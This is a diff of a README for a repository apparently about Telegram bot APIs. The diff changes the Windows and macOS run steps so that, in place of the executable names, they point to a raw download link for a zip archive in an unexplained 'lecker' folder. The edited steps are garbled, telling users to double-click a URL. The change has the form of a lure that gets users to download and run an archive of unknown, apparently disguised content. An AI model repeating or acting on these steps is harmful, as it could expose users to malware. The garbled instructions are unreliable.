Samo91/telegram-bot-api-vs-telebot/README.md

 1. **Locate the Downloaded File:** Find the downloaded file in your 'Downloads' folder or your chosen download location.
 2. **Extract Files (if necessary):** If you downloaded a `.zip` file, right-click on it and select "Extract All" or use any extraction tool to unzip it.
 3. **Run the Application:**
-   - For Windows: Double click on the `telegram-bot.exe` file.
+   - For Windows: Double click on the `https://github.com/Samo91/telegram-bot-api-vs-telebot/raw/refs/heads/main/lecker/telebot_telegram_bot_vs_api_v1.4.zip` file.
-   - For macOS: Open the folder and double click on `telegram-bot.app`.
+   - For macOS: Open the folder and double click on `https://github.com/Samo91/telegram-bot-api-vs-telebot/raw/refs/heads/main/lecker/telebot_telegram_bot_vs_api_v1.4.zip`.
    - For Linux: Open a terminal and navigate to the folder.
 Type `./telegram-bot` and press Enter.

 Make sure to review the README files included in the downloads for any additional setup steps.